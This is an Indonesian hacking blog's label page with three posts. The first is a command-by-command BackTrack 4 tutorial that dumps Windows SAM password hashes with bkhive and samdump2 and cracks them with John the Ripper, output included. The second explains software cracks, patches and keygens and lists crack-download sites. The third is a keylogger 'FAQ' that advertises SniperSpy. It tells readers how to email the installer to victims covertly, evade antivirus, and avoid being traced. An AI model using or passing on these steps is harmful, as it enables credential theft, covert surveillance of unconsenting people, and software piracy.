Tampilkan postingan dengan label Cracking. Tampilkan semua postingan
Tampilkan postingan dengan label Cracking. Tampilkan semua postingan

2
Cracking Password Windows Via Backtrack 4

Untuk kali ini kita akan mencoba cracking password windows via backtrack 4 live CD (kamsudnya dengan booting melalui CD backtrack 4), sebetulnya tutorial ini pernah di buat oleh ncang assadotcom di JS dengan menggunakan BT 2 kalo gak salah, tapi untuk kali ini ane coba di BT 4 prefinal.

1.Pertama setting di bios anda booting dari CD
2.Kemudian masuk ke BT seperti biasa dengan perintah startx
3.kita lanjut ke tahap mengkases file windows via BT, kenapa kita mengakses data windows, yah terang aja kan kita mau ngecrack passwordnya yg terletak di direktori C://WINDOWS/system32/config/ SAM , file yg bernama SAM inilah tempat di mana windows menyembunyikan password login windows. Wokeh lalu masuk di bt console dan ikuti langkah berikut:

untuk mengakses file window dan mounting di BT
root@backtrackers:~# mountconfig

maka akan muncul tampilan Disk & FileSystem Configuration, selanjutnya di situ kita bisa lihat bahwa drive C: windows terletak di partisi 1, atau kita bisa analisa satu persatu kok. Klik di partisi tersebut lalu klik new untuk merubah mountingnya. Lalu configurasi sbb:
Type: Automatic
Mount Point: /mnt/sda1 (kalo belum ada folder sda1 nya silahkan di buat yah)
Device: /dev/sda1/
pastikan posisinya udah enable alias warna ijo......

selanjutnya lakukan mounting dengan perintah:
root@backtrackers:~# mount /dev/sda1 /mnt/sda1
maka drive window sudah bisa kita akses di bt
lalu lihat secara detail file windowsnya, bisa juga kita lihat di explorer nya bt dimana letak file SAM nya.

root@backtrackers:~# ls -l /mnt/sda1/WINDOWS/system32/config/SAM -rwxrwxrwx 1 root root 262144 2009-11-10 00:17 /mnt/sda1/WINDOWS /system32/config/SAM

untuk selanjutnya windows menyembunyikan sistem proteksi file SAM nya di file yg bernama syskey yang terletak di direktori berikut:
root@backtrackers:~# ls -l /mnt/sda1/WINDOWS/system32/config
total 31916
-rwxrwxrwx 1 root root 6029312 2009-11-11 01:23 system
(karena terlalu banyak untuk di tampilkan, jadi gwe capture aja file target kita, yaitu system)

okey kita udah dapet yg namanya file system, dan untuk selanjutnya kita akan capture file syskey tersebut dan kita jadikan sebuah file dengan program yg namanya bkhive yang terletak di :
aplikasi > backtrak > privilege escalation > password attack > offline attack > bkhive

atau langsung ketik di console juga gpp, gak dosa kok :)), disini nama file output yg gwe buat adalah wsyskey (buat penamaan terserah lo pada deh, mau bikin asiacarerasyskey atau tukul_syskey juga ga jadi masalah ;)) )

root@backtrackers:~# bkhive /mnt/sda1/WINDOWS/system32/config/system wsyskey
bkhive 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author: ncuomo@studenti.unina.it

Root Key : $$$PROTO.HIV
Default ControlSet: 001
Bootkey: 0c7b80c915ccc01cd4e949af7ebdde90

okey kita udah berhasil membuat file syskeynya, bisa di liat kok (gwe simpern filenya di /root)
root@backtrackers:~# ls -l
-rw-r--r-- 1 root root 16 2009-11-10 23:01 wsyskey

selanjutnya untuk melihat file yg terenkripsi didalam file system kita gunakan program samdump2
aplikasi > backtrak > privilege escalation > password attack > offline attack > samdump2

so yang artinya, jadi.., masukin perintah begono noh......, sehingga muncullah beberapa login yg ada di windows yg udah kita dump dari file sam

root@backtrackers:~# samdump2 /mnt/sda1/WINDOWS/system32/config/SAM wsyskey
samdump2 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author: ncuomo@studenti.unina.it

Root Key : SAM
Administrator:500:545a8bd6333a94aff4227b3697fb5b7c:71dd6e54afa0b12d34f6aadb93a02564:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:4977de14abb666c164f9f2ff61b57ac6:2932ca40988c78b801d226c8140b6702:::
juliaperes:1002:aad3b435b51404eeaad3b435b51404ee:ce899a3735c9489ffdc2c48df3ed6fdd:::
vinblackganteng:1003:85fcfffed6e0e9fcb75e0c8d76954a50:b33902ac5aacd0a02af58e900fa594a5:::

sekanjutnya...., eh sori.., selanjutnya kamsudnya....., kita rubah file wsyskey tadi menjadi file hash dalam ekstensi .txt , selanjutnya filenya ane kasih nama whash.txt

root@backtrackers:~# samdump2 /mnt/sda1/WINDOWS/system32/config/SAM wsyskey > whash.txt
samdump2 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author: ncuomo@studenti.unina.it

Root Key : SAM

lalu liat kembali apa file tersebut udah jadi apa belon.....
root@backtrackers:~# ls -l
total 162944
-rw-r--r-- 1 root root 431 2009-11-10 23:05 whash.txt
nah lo udah ngonol...eh nongol dia...... ;)) , lalu liat isinya dengan perintah cat

root@backtrackers:~# cat whash.txt
Administrator:500:545a8bd6333a94aff4227b3697fb5b7c:71dd6e54afa0b12d34f6aadb93a02564:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:4977de14abb666c164f9f2ff61b57ac6:2932ca40988c78b801d226c8140b6702:::
juliaperes:1002:aad3b435b51404eeaad3b435b51404ee:ce899a3735c9489ffdc2c48df3ed6fdd:::
vinblackganteng:1003:85fcfffed6e0e9fcb75e0c8d76954a50:b33902ac5aacd0a02af58e900fa594a5:::

nah udah nongol lagi dah.., file2 user login dengan enkripsi hash nya, dan untuk selanjutnya kita akan crack file hash tersebut dengan program di bt4 prefinal yg namanya john (bukan john banting yah ,, hehehe) yang ada di
aplikasi > backtrak > privilege escalation > password attack > offline attack > john

root@backtrackers:/pentest/passwords/jtr# ./john /root/whash.txt

sehingga si bang john akan mengcrack file hash yg ada di file whash.txt tersebut yang kemudian menampilkan password windows tersebut, dalam proses crackingnya program ini seolah2 seperti hang, padahal dia sedang melakukan bruteforce terhadap file tersebut sehingga jika kita tidak akan menunggu lebih lama kita tekan aja control c untuk men setop prosesnya.

Karena bang john tidak bisa membedakan huruf besar kecil dan besar maka kita lihat file yg di simpen bang john di direktori dia sendiri yaitu
root@backtrackers:~# cat /pentest/passwords/jtr/john.pot
$1$xd5xuJYT$x6un0Ho.gXVCv4ZduhsYQ.:toor
$LM$aad3b435b51404ee:
$LM$f4227b3697fb5b7c:SEKSI
$LM$b75e0c8d76954a50:GANTENG123

dan yang terkahir setelah kita lihat di direktori bang john kembali kita tampilkan file pamungkas dengan perintah cat

root@backtrackers:/pentest/passwords/jtr# ./john --show /root/whash.txt

maka terlihatlah password untuk
vinblackganteng: ganteng123
juliaperes: SEKSI

NB:
1. untuk proses crackingnya terkadang penggunaan password yg panjang dan multikarakter sepertinya bang john cukup kesulitan atau memakan waktu lama (perasaan ane sih, mungkin ada temen2 laen yg punya teknik sendiri atau solusi, yang jelas file hash nya udah kita dapetin)
2. dalam proses cracking ini bang john tidak akan mengulangi lagi terhadap file yang udah di cracknya, jadi walaupun kita mengulanginya sampai 10 kali, si john tetap pada pendiriannya yaitu cracking yg pertama.

Source: xcode

3
Perbedaan Antara Crack, Patch, Keygen?

.
Jika Anda pernah menggunakan atau mendownload software bajakan yang langsung full version, pasti Anda sudah tidak asing lagi dengan nama “crack”. Ya, “crack” lah yang dapat membuat software Anda menjadi full version secara illegal. Namun apakah Anda juga pernah menggunakan “patch” agar software Anda menjadi full version? Bagaimana dengan “keygen”? Apakah Anda juga pernah menggunakannya?

Ketiga nama aneh yang Saya sebut tadi (crack, patch, keygen) merupakan sesuatu yang biasanya Anda temui jika mencari atau mendownload software full version secara illegal. Namun apa sebenarnya perbedaan dari mereka bertiga?

Mari kita bahas satu persatu.

1. Crack

Crack dalam bahasa inggris berarti pecahan / retakan. Sama seperti artinya, crack merupakan bagian dari suatu software yang sudah dirubah isinya oleh seseorang / kelompok. Kebanyakan, bagian yang dirubah isinya oleh “cracker” adalah file executable (*.exe) suatu software, namun ada juga yang merubah isi file library (*.dll). Oleh karena itu, file crack umumnya berekstensi (*.exe) atau (*.dll). Hal ini juga yang menjadi kelemahan suatu crack, kebanyakan crack tidak dapat dipakai pada versi software yang berbeda.

Crack fungsinya bukan hanya dapat membuat software menjadi full version saja, namun juga ada crack untuk game yang dapat membuat game yang seharusnya memerlukan CD original game tersebut, menjadi tidak memerlukan CD lagi. Biasanya crack itu disebut “NoCD-Crack atau NoDVD-Crack”.

Cara menggunakan crack cukup mudah, Anda cukup menginstall softwarenya, lalu mengopy file cracknya ke tempat software tadi di install (me-replace file asli).

Contoh: Anda menginstall software “A” pada folder “C:Program FilesA”, jika Anda punya crack software tersebut, dan cracknya bernama “A.exe”. Anda cukup menaruh file “A.exe” pada folder “C:Program FilesA”. Jika ada peringatan Confirm File Replace, Anda hanya tinggal pilih “Yes”.

Pembuat crack pada umumnya bekerja berkelompok, mereka membuat sebuah “Cracker Team” dengan suatu nama. Jika mereka sudah membuat suatu crack, mereka akan merilisnya pada suatu situs khusus koleksi crack. Mereka juga memberi tanda pada crack yang mereka rilis, biasanya mereka memberi tanda dengan memberi file berisi informasi mereka berekstensi .nfo.

2. Patch / Patcher

Jika diterjemahkan dalam bahasa indonesia, patch berarti tambalan. Patch dalam dunia game pc merupakan tambalan / update dari suatu game untuk memperbaiki error / bug pada game, maupun menambah fitur suatu game. Patch untuk update game ini menggunakan UI (User Interface) agar user dapat dengan mudah mengupdate game favoritnya. Hanya tinggal tekan next, next, i agree, next, lalu update, Patch langsung mengupdate game tersebut secara otomatis. Menambal error dan menambah fitur.

Namun berbeda fungsi antara patch di dunia game dengan dunia pembajakan software, path pada dunia pembajakan memang juga mempunyai UI (User Interface). Namun fungsinya yang berbeda, patch ini menulis data pada bagian software dan registry. Yang biasa ditulisnya adalah file executable software tersebut. Ada juga crack yang menulis pada registry.

Itulah yang menjadi kelebihan patch, ada beberapa patch yang dapat digunakan pada software dengan versi berbeda. Jika ada patch dengan nama misal “Software A Universal Patcher”, berarti patch tersebut dapat digunakan untuk semua versi dari Software A, baik versi 1 maupun 9, patch tersebut tetap dapat digunakan. Lain halnya jika patch tersebut punya nama “Software A 1.xxx Patch”, berarti patch tersebut dapat digunakan pada semua Software A yang punya bersi mayor 1, misal Software A 1.3, Software A 1.8 dan lainnya asal versi mayor (utama) nya masih 1.

Hanya dengan menaruh patch di folder letak Anda menginstall software tersebut, jalankan Patch, dan tekan tombol “Patch”, maka seketika itu juga patch menulis beberapa data pada bagian software dan registry. Setelah proses patching sukses, kini software sudah menjadi full version / terdaftar (registered). Nah, software Anda kini berstatus patched.

Patch dibuat oleh perseorangan / berkelompok. Sama seperti crack, kelompok tersebut juga mempunyai nama masing – masing. Mereka juga merilis patch buatan mereka pada situs – situs crack. Pada umumnya, UI (User Interface) patch unik dan menarik, entah itu memang tradisi mereka atau apa. Sama seperti pembuat crack, pembuat pacth juga menaruh informasi mereka bersama dengan patch yang mereka rilis, indormasi itu berbentuk file berekstensi *.nfo.

3. Keygen

Keygen, merupakan kependekan dari Key Generator. Sebuah program yang dapat menghasilkan serial untuk suatu software. Serial yang dihasilkan oleh sebuah Keygen dapat bermacam – macam dan berbeda, namun tetap mempunyai pola yang sama namun berbeda, contoh mudahnya:

* Serial yang dihasilkan pertama: A1A23
* Serial yang dihasilkan kedua: B2B34
* Serial yang dihasilkan ketiga: C3C45

Nah, seperti itulah contoh mudah pola serial yang dihasilkan oleh sebuah Keygen, namun lebih rumit lagi.


Sebagai contoh saja, ini sedikit daftar situs – situs crack… :)

* cracks.am ==>
* keygen.us ==>
* allcracks.net ==>
* andr.net ==>
* crack.ms ==>
* crackz.ws ==>
* cybercracks.co.uk ==>
* crackarchive.com ==>
* crackdb.com ==>
* crackzplanet.com ==>
* crackway.com ==>
* mscracks.com ==>



Bookmark and Share


1
Keyloggers : Configure

.
Here is a DETAILED tutorial which contains every possible information that you need to know about keyloggers which includes how to use it, how it works etc.

WARNING: I highly recommend that you read this post completely since every single piece of information is important.

I know most of you are new to the concept of keyloggers. For some of you, this might be the first time you heard about the term “keylogger”. So to give you a clear picture and make you understand better I would like to take up this post in the form of FAQs (Frequently Asked Questions). Here we go…

1. What is a Keylogger?

A keylogger (also called as spy software) is a small program that monitors each and every keystroke a user types on a specific computer’s keyboard. A keylogger program can be installed just in a few seconds and once installed you are only a step away from getting the victim’s password.

2. How Keylogger works?

Once the keylogger is installed on a PC, it starts operating in the background (stealth mode) and captures every keystroke of the victim on that PC. Let’s take up a small example: The victim goes to http://mail.yahoo.com and types his “username” and the “password” in the respective fields to login. The keylogger silently records these keystrokes and stores them in the logs. These logs when opened up shows the captured “username” and “password” and will also tell you that they were typed in the Yahoo login page. Thus the keylogger loads upon every startup, runs in the background and captures each and every keystroke.

3. How to install the keylogger?

A keylogger can be installed just like any other program. Just follow the screen instructions and you’re done.

4. Do I need any special knowledge to install and use the keylogger?

Absolutely NOT! Anyone with a basic computer knowledge can install and use the keylogger. It requires no special skills.

5. Once I install the keylogger can the victim come to know about it’s presence?

No. The victim will never come to know about the presence of the keylogger on his/her computer. This is because, once installed the keylogger will run in total stealth mode. Unlike other programs it will never show up in start-menu, start-up, program files, add/remove programs and task manager. So the victim can no way identify it’s presence on his/her PC.

6. Can I be traced back if I install the keylogger on some other computer?

No, it’s almost impossible to trace back to you for installing the keylogger on other’s PC.

7. Which keylogger is the best?

Today there exists hundreds of keyloggers on the market and most of them are no more than a scam. So I tested some of the top keyloggers and conclude that the following is the best one.
SniperSpy

8. How SniperSpy works?

I will try to explain the working of Sniperspy in simple steps.

1. After you purchase Sniperspy, you’ll be able to create the installation module using easy set-up program. You need to email this module to the remote user as an attachment.

2. When the remote user runs the module it’ll get installed silently and monitoring process will begin. The keystrokes are captured and uploaded to the SniperSpy servers continously.

3. You can login to your Sniperspy account (you get this after purchase) to see the logs which contains the password.

9. I don’t have physical access to the traget computer. Can I still use SniperSpy?

Yes you can. SniperSpy supports REMOTE INSTALLATION feature which allows you to remotely install the program on any PC even if you have no physical access to it. For remote installation all you need to do is just place the module (refer FAQ-8) in a .zip/.rar file and send it as an attachment to the target email address (for which you need the password).

10. Can I install SniperSpy on a local computer?

If you need to install to your local (current) computer instead of your remote computer, then the process is simple. Simply navigate to the folder in which you saved your module ( Refer FAQ-8). Double-click the module filename to execute it. Nothing will appear on the screen as the software is installed.

11. What if the antivirus block from sending it as an email attachment?

Instead of sending the keylogger as an email attachment, it is recommended that you place the file in .ZIP/.RAR format and upload it to www.hotlinkfiles.com. After uploading, just send the direct download link to the victim via email. Once he downloads the file from this link and run it, the keylogger will get installed automatically.

12. Why SniperSpy is the best?

* SniperSpy supports REMOTE INSTALLATION feature. This feature is not present on most of the keyloggers.
* SniperSpy is fully compatible with Windows 98/ME/2000/XP/Vista and bypasses ANY Firewall.
* SniperSpy is more reliable than any other keylogger program. You need not rely on your email account to receive the logs. Instead you can just login to your online SniperSpy account to receive the logs.
* SniperSpy captures full-size screenshots of the activities on the target PC.
* Records BOTH sides of chats / IMs in Google Talk, Yahoo IM, Windows Live and more.
* SniperSpy is more easy to install and requires no extra knowledge.
* SniperSpy is recognized by BBC, CNN, CBS and other news networks. Hence it isreputed and trustworthy.

13. How safe is to use SniperSpy?

Sniperspy is completely safe to use since all the customer databases remain confidential and private. SniperSpy do not collect any information from your system other than the information required for the product’s successful operation. They will not contact you in any way unless you request assistance.

14. Is my online order 100% Safe and Secure?

Absolutely Yes! All the e-commerce transactions for SniperSpy is handled by Plimus – they are a trusted online retailer specializing in digitally delivered products. All your information remains private and secure. The safety and protection of your personal information is 100% guaranteed. So you can place your order for SniperSpy with no worries of scam!

SniperSpy is completely reliable, safe and best keylogger out there. It is really worth the price that you pay for it. I promise that you cannot get a better keylogger than this. So what are you waiting for? Go grab SniperSpy now! Visit the following link for more informaion.

Source: Go-Hacking


Bookmark and Share


 
Ujie Caprone | © 2011 Blogger Template by Ujiecaprone.com